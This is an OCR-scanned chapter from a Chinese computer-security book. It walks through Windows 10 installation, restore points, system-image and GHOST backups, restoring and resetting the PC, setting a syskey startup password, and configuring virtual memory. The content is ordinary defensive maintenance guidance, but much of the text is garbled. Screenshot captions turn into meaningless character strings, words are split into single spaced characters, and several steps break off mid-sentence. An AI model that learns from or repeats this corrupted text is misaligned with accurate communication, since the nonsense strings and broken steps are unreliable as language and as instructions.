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电脑 系统 安全 的 防护 策略 = 


step[ 因 当 设置 完成 ， 单 击 “ 下 一 步 ” 按 钮 ， 
进入 安装 确认 操作 页 面 。 


| 了 windows 立 半 忆 地 


程序 正在 启动 ”页 面 。 


安装 程序 正在 启动 


[step 图 稍 后 进入 “激活 Windows” 页 面 ， 需 
要 在 此 页 面 中 输入 Windows 10 操 作 系 统 的 
产品 密 匙 ， 然 后 单 击 “ 下 一 步 ” 按 钮 。 
© vinon ees 
激活 Windows 
eT 


记 才 名 各 这 样 。00000t-poo0rtnxty 


如果 你 正在 重新 安装 Witena， 请 寺 拉 。 找 没有 产品 匡 户 ”。 稍 后 次 自动 不 于 人 9 yincovz 到 二 = 


度 寺 志 明代 ) et er) 


[BE 进入 “许可 条 款 ”页 面 ， 在 此 页 面 中 
勾 选 “我 接受 许可 条 款 ” 选 项 ， 并 且 单 击 
“下 一 步 ” 按 钮 。 
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step 图 单 击 “现在 安装 ”按钮 ， 进 入 “安装 


黑客 攻防 与 电脑 安全 从 新 手 到 高 手 〈 微 视频 + 火力 升级 版 ) 


最 后 更 新 时 间 : 2015 年 7 月 ~ 
蕉 孝 效 件 许可 条 喜 
WINDOWS 搓 作 系统 


吉林 人 民生 《 革 业 有 去 芝 直 在 关 国清 阅读 委 10 节 中 只 有 约 灰 力 的 名 
裁 条 吉 和 共同 把 诉 弃 视 ， 它 洒 响 争议 的 解决 方式 , 


忆 话 侈 选择 蕉 软 1 
根 和 区 各 


-和 的 设备 机 这 商 ， 如 


TI 


[Sep 图 完成 “下 一 步 ” 按 钮 操作 后 ， 进 入 
“你 想 执行 哪 种 类 型 的 安装 ? ”页 面 ， 
这 里 选择 “ 自 定 义 : 仅 安 装 Windows (高 
级 ) ”选项 ， 如 果 需 要 升级 ， 则 单 击 “ 升 
级 : 安装 Windows 并 保留 文件 、 设 置 和 应 用 
程序 ”选项 。 


© hms 


了 上 if 和 是 灾 失 的 


人 半 indows 全 
rs 


汪汪 


Dt 
i i 


WN 


稍 后 进入 “你 想 将 Windows 安 装 在 哪 
里 ? ”界面 ， 单 击 “ 新 建 ” 链 接 ， 开 始 创 


建 硬盘 分 区 ， 填 写 硬盘 分 区 的 大 小 ， 并 单 
击 “ 应 用 ”按钮 。 
[FT | 
ET 
a Kr 人 exam ED 
@ teeta SEL 村 加 : Fn He a [天 站 可 


step 辆 单 去 “应 用 ”按钮 后 ， 弹 出 确认 提示 
框 ， 单 击 “确定 ”按钮 。 


全 Td 
你 想 将 时 naows 安 蔡 在 嘟 皇 ? 
3 一 — T | 司 册 全 同 | 冯 型 ] 
Wi 0 A CELE] EXE] 
Windews 雪 装 程序 


FSD 


第 一 个 分 区 完成 ， 如 果 还 想 继续 为 硬 


盘 分 区 ， 单 击 “ 新 建 ” 链 接 就 可 以 。 


@ une 


你 起 将 Windows 安装 在 哪里 ? 


本 站 
i i 0 HE 1 Ri gm 0 RE 
i NH 107 多 io 困 2 区 
| Pr 
Mi) su tt i 


rete RR 大 小 人 [wm 吉 w ER | RN 


Fs 


step 图 硬盘 分 区 完成 ， 单 击 “ 下 一 步 ” 
按钮 。 


© Avonases | 


你 起 将 Windows 安装 在 路 旦 ? 


区 了 AM] | 


EE sm 
ER Wg 7g 3 区 
[oa 5， 95 人 全 9 
> 3 押 3 办 


全 BE x ey 人 #20 
全 JE 号 要 0) 


[下 


驱动 准备 完成 以 后 ， 接 下 来 进入 系 
统 的 设置 引导 界面 ， 对 Windows 10 进 行 
设置 ， 你 可 以 直接 单 击 右 下 角 的 “使 用 快 
速 设置 ”来 使 用 默认 设置 ， 也 可 以 单 击 屏 


幕 左 下 角 的 “ 自 定义 设置 ”来 逐 项 安排 。 


在 这 里 直接 单 击 “ 使 用 快速 设置 ”按钮 


继续 。 


第 6 章 ”电脑 系统 安全 的 防护 策略 = 


step 图 进入 “ 自 定义 设置 ”页 面 ， 根据 需 要 
设置 快捷 方式 。 


自 定义 设置 完成 ， 单 击 “ 下 一 步 ” 按 
钮 ， 稍 等 一 会 儿 ， 接 下 来 进入 设置 账户 页 
面 ， 根据 用 户 的 使 用 选择 电脑 所 有 者 ， 在 
这 里 选择 “我 拥有 它 ” 选 项 ， 单 击 “ 下 一 
步 ”按钮 。 


谁 是 这 台电 脑 的 所 有 者 ? 


Eee 加 进入 “个 性 化 设置 ”页 面 ， 拥 有 
Microsoft 账 户 可 以 进行 登录 ， 没 有 账户 的 
可 以 进行 创建 ， 这 里 选择 “ 跳 过 此 步骤 ” 
选项 。 
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step 加 进入 “为 这 台电 脑 创 建 一 个 账户 ” 界 
面 ， 输 入 用 户 名 、 密 码 和 密码 提示 ， 并 且 
单 击 “ 下 一 步 ” 按 钮 。 


为 这 台电 脑 创建 一 个 帐户 


请 光 择 白 忆 电 于 记 储 但 8 人 很 难 铺 型 的 内 容 . 


进入 Windows 10 操 作 系 统 引 导 界 面 。 


step 图 张 过 系统 引导 页 面 ， 进 入 Windows 10 
操作 系统 主页 面 ， 系 统 安 装 完成 。 
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SS 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


6.3 ”系统 安全 提前 准备 之 备份 


常见 备份 系统 的 方法 为 使 
的 工具 备份 和 Ghost 工 具备 份 。 


6.3.1 使 用 系统 工具 备份 系统 


Windows 10 操 作 系 统 自 带 的 备份 还 原 
功能 更 加 强大 ， 为 用 户 提供 了 高 速度 、 高 
压缩 的 一 键 备份 还 原 功能 。 


系统 自 带 


1. 开启 系统 还 原 功能 

要 想 使 用 Windows 操 作 系 统 工具 备份 和 
还 原 系统 ， 首 选 需要 开启 系统 还 原 功 能 ， 
具体 的 操作 步骤 如 下 。 
[step 图 右键 单 击 电脑 桌面 上 的 “此 电脑 ”图 
标 ， 在 弹出 的 快捷 菜单 中 选择 “属性 ”选项 。 


打开 (O) 


[Eee 国 在 打开 的 窗口 中 ， 单 击 “ 系 统 保护 ” 


豆 台 pe 


[ssp 图 弹出 “系统 属性 ”对 话 框 ， 在 “保护 
设置 ”列表 框 中 选择 系统 所 在 的 分 区 ， 并 
单 击 “配置 ” 按 钮 。 


第 6 章 ”电脑 系统 安全 的 防护 策略 = 


a 


x sm 
NA | x | 拓 和 in 硬件。 高 江 。 玫 全 护 运 旭 
Sr 


可 以 和 过 检 计 算 中 下 到 上 一 个 下 碧 寺 ,将 
EP 


可 以 对 过 格 秆 算 机 环 计 到 上 一 个 还 夺 点 . 近江 
至 统 更 改 . 


系 纺 下 原 回 - 


百 要 创建 还 原点 ， 请 先 寺内 反动 基 并 章 主 本 妆 " 宁 
ET 


Be 弹出 “系统 保护 本 地 磁盘 ”对 话 框 ， = | 


选中 “启用 系统 保护 ” 单 选 按钮 ， 将 调整 [step 图 弹出 “创建 还 原点 ”对 话 框 ， 在 文本 
“最 大 使 用 量 ” 滑 块 到 合适 的 位 置 ， 然 后 ” 框 中 输入 还 原点 的 描述 性 信息 。 
单 击 “ 确 定 ” 按 钮 。 

创建 还 原点 


各 系统 怀 护 二 地 而 和 (C) 区 


还 原生 


键入 可 以 帮助 你 识别 还 原点 的 病 述 ， 系 统 会 皇 动 添加 当前 日 期 和 时 间 , 
局 用 系统 尺 护 后“ 丛 可 以 通过 及 时 笠 计 算 负 下 原 到 前 的 村 个 状 志 具 宣 少 不 要 
要 的 更 改 , 


还 原点 
口 华 用 且 统 保护 
画 
加 
umes emma sxe seamene 单 击 “创建 ”按钮 ， 即 可 开始 创建 还 
原点 。 
3 人 用 有: oFF 
最 大 使用 重 (M); 日 四 
95% (46.39 G9] 正在 创建 还 原点 … 
列队 此 驱动 的 所 有 还 原 占 、 Er 


NO EA) 


Ee 加 创建 还 原点 的 时 间 比 较 短 ， 稍 等 片刻 

就 可 以 了 。 创 建 完 毕 后 ， 将 打开 “已 成 功 

2。 创建 系统 还 原点 创建 还 原点 ”提示 信息 ， 单 击 “ 关 闭 ” 按 
用 户 开启 系统 还 原 功 能 后 ， 默 认 打开 和 

保护 系统 文件 和 设置 的 相关 信息 ， 保 护 系 | ss 

统 。 用 户 也 可 以 创建 系统 还 原点 ， 当 系统 | ses 

出 现 问 题 时 ， 就 可 以 方便 地 恢复 到 创建 还 

原点 时 的 状态 。 

[5 在 上 面 打开 的 “系统 属性 ”对 话 框 

系统 所 在 的 分 区 ， 单 击 “ 创 建 ”按钮 windows 10 操 作 系 统 为 用 户 提供 了 系 由 


统 映像 的 备份 功能 ， 使 用 该 功能 ， 用 户 可 以 
备份 整个 操作 系统 ， 具 体 的 操作 步骤 如 下 。 


[step 国 在 “控制 面板 ”窗口 中 ， 单 击 “ 备 份 


和 还 原 (Windows) ”链接 。 


国 寺 ER 
< > -个 画 ， 0， 


词 整 计 算 机 的 设置 下 记 


| 天 
es 


用 户 帐户 

四 Ew 
ET sos 
网 绢 和 Internet 
EM 


a 
7 硬件 和 声 请 
地 EL 
Sm 
内 | 得 到 
加 | we 


弹出 “备份 和 还 原 ” 窗 口 ， 单 击 “ 创 
建 系统 映像 ”链接 。 


仿生 从 EE 原 
+ 个 寺 ， 32 厢 本 ， 素 的 生 全 各 人 要 “5 时 
ee 备份 或 还 床 你 39 文 性 
Posemer 各 从 
rs a we 
am 
下 一 次 全 从: 
Hm 
A 
让 


上 弹出 “你 想 在 何 处 保存 备份 ? ”对 话 
呈 这 里 有 3 种 类 型 的 保存 位 置 ， 包 括 在 硬 
盘 上 、 在 一 张 或 多 张 DVD 上 和 在 网 络 位 置 
上 ， 本 实例 选中 “在 硬盘 上 ” 单 选 按 钮 ， 
单 击 “ 下 一 步 ” 按 钮 。 


a 
你 起 在 何 处 保存 备份 ? 
所 90、 它 亿 癌 以 亿 全 基 怕 扩 各 ， 环 内 和 可 帮 了 丰 大 二 这 


素 引 扩 和 呈 运 行 Wi 
te 


国生 大 委 上 IH) 
一 HG) 妇 00 68 本 ES 且 忆 
让 尝 和 位 于 要 各 从 的 同一 和 对 开 全 上 。 代 系 此 广 委 二 届 效 这， 村 天 拓 名 全 


口 在 -六 到 2 攻 DND 上 ID) 
Ovo rw (Hy) 


ON 
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step 国 弹出 “你 要 在 备份 中 包括 哪些 驱动 
器 ? ”对 话 框 ， 这 里 采用 默认 的 选项 ， 单 
击 “ 下 一 步 ” 按 钮 。 


ss 


他 要 在 备份 中 包括 圭 些 驱动 器 ? 
直下， 相生 全 二 Windows 有 并 允 拓 。 作 不 共和 下 下 全 人 的 开拓 


Ee i (3. 


= Ee 7] 

Wndows0 (CY CR Soo01 ce 152668 
Dsm 2oaol 68 767G8 
[a zs000G68 568 
Don 3a15168 24968 
Dm ee aee 
二 5 608 
a (6) 上 eae a900G8 


A 
本 


Fm ] ws 


[5s 国 弹出 “确认 你 的 备份 设置 ”对 话 杠 ， 
单 击 “开始 备 份 ”按钮 。 


ss 


确认 你 69 备份 催 轩 
eos 

~ se 
E16 ce tS 


Ra rime 


Wo Windowrto cl Ee 


[EC 


Step 图 系统 开始 创建 系统 映像 ， 并 显示 备份 


大 Sa 一 区 


Windows 正在 代入 全 


EE Windows10 (C).. 


人 上 人 (5) 


step 罗 备份 完成 后 ， 单 击 “ 关 闭 ” 按 钮 即 可 。 


是 3 = X 
个 从 已 成 功 光 成 。 


(0 


6.3.3 ”使 用 Ghost 工具 备份 系统 


一 键 GHOST 是 一 个 图 形 安装 工具 ， 主 要 
包括 一 键 备份 系统 、 一 键 恢复 系统 、 中 文 向 
导 、GHOST11.2、DOS 工 具 箱 等 功能 。 使 用 
一 键 GHOST 备份 系统 的 具体 操作 步骤 如 下 。 
[step 加 下 载 并 安装 一 键 GHOST 后 ， 即 可 


弹出 “一 键 备 份 系统 ”对 话 框 ， 此 时 一 键 
GHOST 开始 初始 化 。 初 始 化 完毕 后 ， 将 自 
动 选中 “一 键 备份 系统 ” 单 选 按 钮 ， 单 击 
“备份 ”按钮 。 

固 一 RS 3 

矶 确 T 工 具 HH 帮 肪 

六 区 贡 队 洛 关 双全 @6 

打开 管理 导入 中 出 RE 记 夏 。 转移 小 告 帮助 关于 


键 GHOST 


加 一 幸 备 价 系统 次 迎 你 ,请 失 【 转 称 ] 个 人 
刍 备 价 系统 。 各 ”放下 3hG， 


警 震 :c 盆 有 外 上 用 主 间 已 经过 
备 各 安 举 http://3oshome.co 


然后 阿 上 备份】 系统 ~ 
二 机 [导入 ] > 


口中 文 向 导 
OGHOST 11.2 
口 Dos 工具 箱 
公 份 取消 


景 近 一 次 惰 内 党 生 在 : 12-22-2012 23:59 


step 图 弹出 “一 键 GHOST” 提 示 框 ， 单 击 
“确定 ”按钮 。 


如 GHOST x 


step 图 系统 开始 重新 启动 ， 并 自动 打开 
GRUB4DOS 莱 单 ， 在 其 中 选择 第 一 个 选 
项 ， 表 示 启 动 一 键 GHOST。 


71821M/8M，End 


[step 园 系统 自动 选择 完毕 后 ， 接 下 来 会 弹出 
“MS-DOS 一 级 菜单 ”界面 ， 在 其 中 选择 
第 一 个 选项 ， 表 示 在 DOS 安 全 模式 下 运行 区 
GHOST 11.2。 


Microsoft MS-D0S 7.1 Startup Menu 


MHDD 
D0S 
Enter 


a choice: 1 Time remaining: 83 


step 图 选择 完毕 后 ， 接 下 来 会 弹出 “MS- 
菜单 ”界面 ， 在 其 中 选择 第 一 个 
选项 ， 表 示 支 持 IDE、SAIA 兼 容 模式 。 


Startup Menu 


CD“DUD EHCI 2.8 
D“DUD OHCI 1.1 
DZDUD UHCI 1.1 


Enter a choice: 1 Time renaining: 84 


step 加 根据 C 盘 是 否 存 在 映像 文件 ， 将 会 
从 主 窗口 自动 进入 “一 键 备份 系统 ”警告 
窗口 ， 提 示 用 户 开始 备份 系统 ， 单 击 “ 备 
份 ” 按 钮 。 


后 开始 备份 ， 


系统 如 下 图 所 示 。 


step 园 此 时 ， 开 始 备份 
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SS 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


6.4 系统 崩溃 后 的 修复 之 还 原 


系统 备份 完成 后 ， 一 旦 系统 出 现 严重 的 
故障 ， 即 可 还 原 系统 到 未 出 故障 前 的 状态 。 


沦 踢 6.4.1 ”使 用 系统 工具 还 原 系统 


在 为 系统 创建 好 还 原点 后 ， 一 旦 系统 
遭 到 病毒 或 木马 的 攻击 ， 致 使 系统 不 能 正 
常 运行 ， 这 时 就 可 以 将 系统 恢复 到 指定 还 
使 用 系统 工具 将 系统 还 原 到 创建 的 还 
原点 ， 具 体 的 操作 步骤 如 下 。 
[step 轩 打开 “系统 属性 ”对 话 框 ， 在 “ 系 
统 保护 ”选项 卡 下 ， 单 击 “ 系 统 还 原 ” 
按钮 。 


系统 还 原 (S).…. 


step 图 弹出 “还 原 系 统 文件 和 设置 ”对 话 
框 ， 单 击 “ 下 一 步 ”按钮 。 


x x 


还 原 系统 文件 和 设置 


js ed 


不仅 任 后 文 总 大 片 或 个 个 人 数 深 ， 必 安 革 的 程序 
到 避 六 全 这 要， 


SEE | Ww | 


弹出 “将 计算 机 还 原 到 所 选 事件 之 前 
的 状态 ”对 话 框 ， 选 择 合适 的 还 原点 ， 一 
般 选 择 距 离 出 现 故障 时 间 最 近 的 还 原点 即 
可 ， 单 击 “ 扫 描 受 影响 的 程序 ”按钮 。 
Ce 

生计 其 还原 对 条 下 什 之 前 的 六 是 


net: OMT+800 


Ea] 3 | 


| 


En 


[sep 园 此 时 ， 弹 出 “正在 扫描 受 影响 的 程序 
和 了 驱动 程序 ”对 话 框 。 


| 二 SR 原 x 
l 同 ”扫描 受 影响 的 程序 和 驱动 程序 

系 综 还 原 IF ,请 向 保 . 

| ™ 

| [CE 


[Sep 图 稍 等 片刻 ， 扫 描 完 成 后 ， 将 打开 详细 
的 被 删除 的 程序 和 驱动 信息 框 ， 用 户 可 以 
查看 所 选择 的 还 原点 是 否 正确 ， 如 果 不 正 
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确 ， 可 以 返回 重新 操作 。 


而 5 x 
rt Ea 
Em 2016n/29 93026 


上 六 开本 所 后 IL 部， 并 开导 e 失 三才 


性 二 二 
= = 
e1011 101116575.227 下 了 


本 Ff0 攻 人 子 ， 于 和 之 后， 这 和子 可 对 无 流下 屋 工 作 ， 因此 妥 骨 二 要 重新 去 沟 
= = 
TSE 


EE 


[Step 图 单 击 “关闭 ”按钮 ， 返 回 到 “将 计算 
机 还 原 到 所 选 事件 之 前 的 状态 ”对 话 框 ， 
确认 还 原点 选择 是 否 正确 ， 如 果 还 原点 选 
择 正确 ， 则 单 击 “ 下 一 步 ” 按 钮 ， 弹 出 
“确认 还 原点 ”对 话 框 ， 如 果 确 认 操 作 正 
确 ， 则 单 击 “ 完 成 ”按钮 。 


® sim x 


确认 还 原点 
KC ) 
1 


ni 下 WU 本 还 下 南天 尖 吾 本 中 的 轨 人 之 前 是 让 的 t 王 - 


C2 2016/1/29 93025 (GMT+ 80 

ms Ta Sue 

Ss | TT 
EL 


如 果 作 更 杰 了 Windows 下 有 ， 拉 娃 六 rg 娃 一 个 人 重生 


天 要 时 后 才 基 记 能 由 用 去 二 要 改 。 对 过 和 人: 之前 ， 海 全 和 有 有 
开交 # 开 关 半 所 有 全 序 ， 


二 CE 可 


[step 国 打开 提示 框 提示 “启动 后 ， 系 统 还 
原 不 能 中 断 ， 你 希望 继续 吗 ? ”， 单 击 
“是 ”按钮 。 电 脑 自动 重启 后 ， 还 原 操作 
会 自动 进行 ， 还 原 完成 后 再 次 自动 重启 电 
脑 ， 登 录 到 桌面 后 ， 将 会 打开 系统 还 原 提 
示 框 提示 “系统 还 原 已 成 功 完成 ”， 单 击 
“关闭 ”按钮 ， 即 可 完成 将 系统 恢复 到 指 
定 还 原点 的 操作 。 


第 6 章 ”电脑 系统 安全 的 防护 策略 = 


二 x 
外 启动 后 ， 系 统 还 原 不 能 中 断 。 你 希望 继续 吗 ? 


给 4 系统 还 厚 已 完成 ， 否 则 无 法 构 其 党 消 。 如 果 在 安全 模式 下 或 从 "系统 信 揽 还 项 - 茸 单 
运行 系统 还 原 ， 则 无 法 洛 消 ， 


Ca Pm 


人 移 提 示 : 如 果 还 原 后 发 现 系统 仍 有 问题 ， 
则 可 以 选择 其 他 的 还 原点 进行 还 原 。 


6.4.2 ”使 用 Ghost 工具 还 原 系 统 


当 系统 分 区 中 数据 被 损坏 或 系统 遭受 器 
病毒 和 木马 的 攻击 后 ， 就 可 以 利用 Ghost 的 
映像 还 原 功 能 将 备份 的 系统 分 区 进行 完全 
的 还 原 ， 从 而 恢复 系统 。 

使 用 一 键 GHOST 还 原 系 统 的 具体 操作 
步骤 如 下 。 

[sep 国 在 “一 键 GHOST” 对 话 框 中 选中 
“一 键 恢 复 系 统 ” 单 选 按钮 ， 单 击 “ 恢 
复 ” 按 钮 。 


[Fe 
TI HN 


吹 区 相国 党 尖 台 疗 


HH Me SA GC @ 
一 性 GHOST 


人 | 2015 玫 08R 1 归 ? 清 和 中 [ 履 团 ] ， 
名和 入 息 : :V1\C_PAN.GHO” 2,182 NB) 


[L 履 | 职 消 

最 近 一 次 焦 夏 发 = 在 ; 10-07-2014 23;36 
step 图 弹出 “一 键 GHOST” 对 话 框 ， 提 示 用 
户 “ 电 脑 必须 重新 启动 ， 才 能 运行 【恢复 】 


程序 …… ”的 信息 ， 单 击 “ 确 定 ” 按 钮 。 
一 旦 GHOST x 
二 入 必须 重新 启动 , 才能 运行 【次 复 ] 程序 ， 
请 保存 和 关闭 正在 使 有 的 其 它 窗 吕 


【 态 定 】 委 重启 吗 ? 
[E 芭 了] 吕 喜 


step 图 系统 开始 重新 启动 ， 并 自动 打开 
GRUB4DOS 菜 单 ， 在 其 中 选择 第 一 个 选 
项 ， 表 示 启 动 一 键 GHOST。 
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step 车 系统 自动 选择 完毕 后 ， 接 下 来 会 弹出 

“MS-DOS 一 级 菜单 ”界面 ， 在 其 中 选择 
第 一 个 选项 ， 表 示 在 DOS 安 全 模式 下 运行 
GHOST 11.2。 


2. 1KEY GHOST 8.3 
3. GHOST 11 
4. GHOST 8.3 


5. DOS TOOLS 
5 DISKGEN 

7, POMAGIC 

8. MHDD 

9. DOs 


选择 完毕 后 ， 接 下 来 会 弹出 “MS- 
DOS 二 级 菜单 ” 界面 ， 在 其 中 选择 第 一 个 
选项 ， 表 示 支 持 IDE、SAITA 兼 容 模式 。 


_EHCI 2 
4. USB-DISK OHCI 1.1 
-DISK UHCI 1.1 


[lstep 较 根据 C 盘 是 否 存 在 映像 文件 ， 将 会 
从 主 窗 口 自 动 进 入 “一 键 恢 复 系统 (来自 
硬盘 ) ”警告 窗口 ， 提 示 用 户 开 始 恢复 系 
统 。 单 击 “ 恢 复 ” 按 钮 ， 即 可 开始 恢复 


step 园 此 时 ， 开 始 恢复 系统 。 


二” 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


[Sep 图 在 系统 还 原 完毕 后 ， 将 打开 一 个 信息 
提示 框 ， 提 示 用 户 恢复 成 功 ， 单 击 “Reset 
Computer” 按 钮 重启 电脑 ， 然 后 选择 从 硬盘 启 
动 ， 即 可 将 系统 恢复 到 以 前 的 系统 。 至 此 ， 
就 完成 了 使 用 GHOST 工具 还 原 系 统 的 操作 。 


Te NISL 4 
Pe sm 


6.4.3 ”使 用 系统 映像 还 原 系统 

完成 系统 映像 的 备份 后 ， 如 果 系 统 
出 现 问题 ， 可 以 利用 映像 文件 进行 还 原 操 
作 ， 上 有 具体 的 操作 步骤 如 下 。 


step 国 在 桌面 上 右 击 “开始 ”按钮 ， 在 打 
开 的 快捷 菜单 中 选择 “设置 ”选项 ， 弹 
出 “设置 ”窗口 ， 选 择 “ 更 新 和 安全 ” 


选项 。 
去 
a 
加 ss eto meee re wr 


RE ES Rm see 


Step 图 弹出 “更 新 和 安全 ”窗口 ， 在 左 侧 列 
表 中 选择 “恢复 ”选项 ， 在 右 侧 窗口 中 单 
击 “ 立 即 重启 ”按钮 。 


+ 三 
ne Er 
Windows 硬 新 
重 置 此 电脑 
liens 各 时 作 9 电 及 直行 异 只， 至 豆 电 科 可 入 会 有 所 盆 ， 王 二 对 
a 
be i 
5 高 级 启动 
a 备 项 本 入 0 U 各 现 DVD) 忆 动 ， 更改 Windows 局 动 加 
MOURA 区 从 系 这 辽 怀 汪 二 Windows， 这 村 齐 司 志 及 
Ei 


step 图 弹出 “选择 其 他 的 还 原 方式 ”对 话 
框 ， 采 用 默认 设置 ， 直 接 单 击 “ 下 一 步 ” 


0 里 作 天 注 江 避 LL 上 次 本 ， 为 作 要 下 下 机 雪 二 闪 匠 功 得 不可 肯 过 村 天 过 各 站 
地 此 可 是 


step 图 弹出 “你 的 计算 机 将 从 以 下 系统 映像 
中 还 原 ” 对 话 框 ， 单 击 “ 完 成 ”按钮 。 


其 WUSAI 下 和 中 委 二 还 


a 2016/20716 3802 (GMT -200) 
+ 


ER 


rT re Mt 
计 豆 矶 人 
| [Ese 2 | 
打开 提示 信息 对话 框 ， 单 击 “ 是 ” 
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step 图 系统 映像 的 还 原 操作 完成 后 ， 弹 出 
“是 否 要 立即 重新 启动 计算 机 ? ”对 话 
框 ， 单 击 “ 立 即 重新 启动 ”按钮 即 可 。 


是 否 要 立即 重新 启动 计算 机 ? 
已 还 村 你 的 计算 机 , 将 在 54 秘 后 生动 本 新 启动 你 的 计算 机 。 
Las 


立即 重新 启动 (R) 


不 要 重新 启动 (D) 


6.5 系统 崩溃 后 的 修复 之 重 置 


对 于 系统 文件 出 现 丢失 或 者 文件 异常 的 
情况 ， 可 以 通过 重 置 的 方法 来 修复 系统 。 重 
置 电 脑 可 以 在 电脑 出 现 问题 时 方便 地 将 系统 
恢复 到 初始 状态 ， 而 不 需要 重 装 系统 。 


6.5.1 在 可 开机 情况 下 重 置 电脑 


系统 后 ， 重 置 电脑 的 具体 操作 步骤 如 下 。 
在 桌面 上 右 击 “开始 ”按钮 ， 在 打开 


的 快捷 菜单 中 选择 “设置 ” 命令， 弹出 “ 设 
置 ”窗口 ， 选 择 “ 更 新 和 安全 ”选项 。 


step 图 弹出 “更 新 和 安全 ”窗口 ， 在 左 侧 列 
表 中 选择 “恢复 ”选项 ， 在 右 侧 窗口 中 单 
击 “ 立 即 重启 ”按钮 。 


< 本 
各 ae EE 
Windows EE¥ 
重 置 此 电脑 
Nutones Peon 各 果 人 的 民 入 去 行 民 光 ,重生 电 扩 相关 们 有 所 妆 动 ， 生 于 时 ， 作 可 
et rt 
和 
了 
BB 高 级 启动 
a Beg Se ove SawWndew Et, 
DE 


1 


选项 ”界面 ， 选 择 


step 图 弹出 “选择 一 个 
“保留 我 的 文件 ”选项 


[step 园 弹出 “将 会 删除 你 的 应 用 ”界面 ， 六 
击 “ 下 一 步 ” 按 钮 。 


Bp 国 弹出 “警告 ”界面 ， 单 去 “下 一 步 ” 


按钮 。 


这 台电 


step 国 弹出 “准备 就 绪 ， 可 以 重 置 
脑 ” 界 面 ， 单 击 “ 重 置 ”按钮 。 


step 国 电脑 重新 启动 ， 进 入 “ 重 置 ”界面 。 


于 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


mn 重 置 完 成 后 会 
界面 。 


进入 Windows 10 系 统 安 


正在 安装 Windows 


step 图 安装 完成 后 ， 系 统 自 动 进入 Windows 10 
桌面 并 可 看 到 恢复 电脑 时 删除 的 应 用 列表 。 


6.5.2 ”在 不 可 开机 情况 下 重 置 电脑 
如 果 Windows 10 操 作 系 统 出 现 错 


普 误 ， 开 
机 后 无 法 进入 系统 ， 此 时 可 以 在 不 开机 的 情 
况 下 重 置 电脑 ， 具 体 的 操作 步 又 如 下 。 


step 国 在 开机 界面 中 单 击 “更 改 默 认 值 或 选 
择 其 他 选项 ”选项 。 


step 图 进入 “选项 ”界面 ， 单 击 “ 选 择 其 他 
选项 ”选项 。 


@ 选项 


step 图 进入 “选择 一 个 选项 ”界面 ， 单 击 
“疑难 解答 ”选项 。 


[step 园 在 打开 的 “疑难 解答 ”界面 中 单 击 
“ 重 置 此 电脑 ”选项 即 可 。 其 后 的 操作 与 
在 可 开机 的 状态 下 重 置 电脑 操作 相同 ， 这 
里 不 再 元 述 。 
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实战 演练 
实战 演练 1 一 一 设置 系统 启动 密码 

在 Windows 10 操 作 系统 中 ， 用 户 可 以 设 占 
置 系统 启动 密码 ， 有 具体 的 操作 步骤 如 下 。 


step 回 按 Windows+R 组 合 键 ， 打 开 “ 运 行 ” 
对 话 框 ， 在 “打开 ”文本 框 中 输入 cmd。 


5 运行 x 


6.6 


二 ) Windows 将 根据 你 所 输入 的 名 称 ， 为 你 打开 杠 应 的 程序 ， 
文件 夹 、 文档 或 Internet 资源 . 


打开 (Q): |cmd 


J 


单 击 “ 确 定 ” 按 钮 ， 系 统 弹出 CMD 
命令 窗口 ， 输 入 syskey。 


国 管理 员 : C\WINDOWS\system32\cm. 口 x 


icrosoft Windows [版 本 10. 0. 17134, 319] 
(c) 2018 Mi crosoft Corporation。 保 留 所 有 权利 。 


A 


:\Users\Administrator>syskey 


step 图 按 Enter 刍 后， 弹出 “保证 Windows 账 
户 数 据 库 的 安全 ”对 话 框 。 


保证 Windows 帐户 数据 库 的 安全 x 


ES 


这 个 工具 可 使 你 配置 帐户 数据 库 以 便 启用 族 外 的 加 
密 , 这样 敌 可 进一步 保护 数据 库 。 


一 县 启用 这 个 加 密 就 不 能 禁用 。 


SS 黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


5 图 单 击 “更 新 ”按钮 ， 弹 出 “启动 密 
钥 ” 对 话 框 ， 选 中 “密码 启动 ” 单 选 接 
钮 ， 并 输入 启动 密码 。 


人 密码 启动 (p) 
在 系统 启动 时 需要 名 入 一 个 密码 。 


密码 (W): 


确认 (CO): 


个 系统 产生 的 密码 (S) 


单 击 “确定 ”按钮 ， 重 启 计算 机 后 ， 
硬 弹 此 “启动 密码 ”对 话 框 ， 在 其 中 输入 


密码 。 


这 台 计 算 机 配置 为 过 要 宅 码 才能 启动 请 蛤 入 启动 
密码 。 


四 
局 


害 码 (P): 


确定 重新 启动 R) | 


step 四 单 去 “确定 ”按钮 ， 进 入 操作 系统 ， 
显示 开机 主页 。 
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侈 提示 :如 果 要 取消 系统 启动 密码 ， 在 运 
行 中 输入 “syskey” 并 按 Enter 键 ， 在 弹出 的 
对 话 框 中 选择 “更 新 ”， 然 后 选中 “系统 
产生 的 密码 ” 单 选 按钮 和 “在 本 机 上 保存 
启动 密 钥 ” 单 选 按钮 ， 单 击 “ 确 定 ” 按 锂 
即 可 。 


启动 鹿角 x 


六 本 动 P) 


| 
一 一 一 一 一 


9 要 统 产生 的 密码 (S) 


个 下 次 盘 上 保存 启动 主角 (D) 
耕 系 统 局 动 时 需要 揪 入 一 张 软 得 
人 在 本 机 上 保存 启动 客 棚 ( 


保存 一 个 过 外 作为 担 作 系统 的 一 部 分 ,在 系统 开 
训 时 不 震 要 任何 交互 扣 作 ,， 


确定 取消 


实战 演练 2 一 一 设置 虚拟 内 存 的 大 小 


计算 机 中 所 运行 的 程序 都 是 由 内 存 执 
行 的 ， 当 执行 的 程序 占用 内 存 过 大 时 ， 可 
能 会 导致 内 存 被 消耗 完 。 为 了 解决 这 一 问 
题 ，Windows 运 用 了 虚拟 内 存 。 所 谓 虚拟 内 
存 ， 是 指 划 出 一 部 分 硬盘 空间 来 充当 内 存 
使 用 ， 让 系统 运行 更 加 流畅 。 设 置 虚拟 内 
存 的 具体 操作 步骤 如 下 。 

[sep 园 在 桌面 上 右 击 “此 电脑 ”图 标 ， 在 弹 
出 的 快捷 菜单 中 选择 “属性 ”选项 。 


打开 (DO) 
国定 到 - 快 带 沪 问 
四 (6) 
国定 到 开始" 屏 墓 (p) 
靳 里 网 阁 红 动 器 (N)- 
